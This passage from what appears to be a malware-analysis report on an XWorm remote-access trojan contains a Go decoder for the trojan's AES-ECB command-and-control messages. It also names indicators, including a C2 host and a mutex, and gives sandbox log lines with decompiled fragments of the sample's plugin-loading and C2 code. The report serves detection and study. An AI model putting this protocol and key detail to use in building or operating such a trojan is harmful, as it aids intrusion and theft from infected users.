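	}
	if len(raw) == 0 || len(raw)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext length is not a multiple of the block size")
	}
	block, err := aes.NewCipher(DeriveKey(keyString))
	if err != nil {
		return "", err
	}
	out := make([]byte, len(raw))
	for i := 0; i < len(raw); i += aes.BlockSize {
		block.Decrypt(out[i:i+aes.BlockSize], raw[i:i+aes.BlockSize])
	}
	plain, err := pkcs7Unpad(out)
	if err != nil {
		return "", err // a wrong key almost always surfaces here as bad padding
	}
	return string(plain), nil
}

// SplitFields separates a decrypted message on the configured SPL token.
func SplitFields(msg string) []string {
	return strings.Split(msg, XWormSPL)
}

func main() {
	// Constructed message; field layout is illustrative, not taken from the capture.
	msg := strings.Join([]string{"INFO", "DESKTOP-EXAMPLE", "user"}, XWormSPL)
	enc, err := EncryptMessage(XWormKey, msg)
	if err != nil {
		panic(err)
	}
	dec, err := DecryptMessage(XWormKey, enc)
	if err != nil {
		panic(err)
	}
	fmt.Printf("derived key: %x\n", DeriveKey(XWormKey))
	fmt.Printf("fields:      %q\n", SplitFields(dec))
}
```

ECB with a static key means identical plaintext blocks produce identical ciphertext blocks across every infected host using this build, which is why the Snort signatures above can match fixed prefix bytes. Note also that <123456789> and <Xwormmm> appear in a large share of public XWorm samples, so the key alone does not identify this operator; the C2 host nmds.duckdns.org and the mutex O3B5rRVaa3oX74CD listed in this report are the sample-specific indicators.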
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@29/14@7/5
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Mutant created: NULL
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Mutant created: \Sessions\1\BaseNamedObjects\O3B5rRVaa3oX74CD
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe ReversingLabs: Detection: 81%
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Virustotal: Detection: 80%
Source: unknown Process created: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe "C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe"
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2496,i,13517212685356134340,2370661816050994569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1124 --field-trial-handle=2028,i,13329251012211762179,12573226295212013179,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2496,i,13517212685356134340,2370661816050994569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1124 --field-trial-handle=2028,i,13329251012211762179,12573226295212013179,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs .Net Code: Memory
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\082C2C722F273426B981 4DA7B92DD81FF96931AA9012EABAA0878D13C78DC3CD840B102CE7E15FEC4B7B
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Memory allocated: 790000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Memory allocated: 1A4E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Window / User API: threadDelayed 5864
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Window / User API: threadDelayed 3919
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe TID: 2720 Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe TID: 8516 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Thread delayed: delay time: 30000
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, 00000000.00000002.4097113629.000000001B0BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWrv%SystemRoot%\system32\mswsock.dll=neutral, PublicKeyToken=31bf3856ad364e35" />
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Queries volume information: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe VolumeInformation
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, type: SAMPLE
Source: Yara match File source: 0.0.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1624173863.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4096024846.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe PID: 2260, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, type: SAMPLE
Source: Yara match File source: 0.0.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1624173863.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4096024846.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
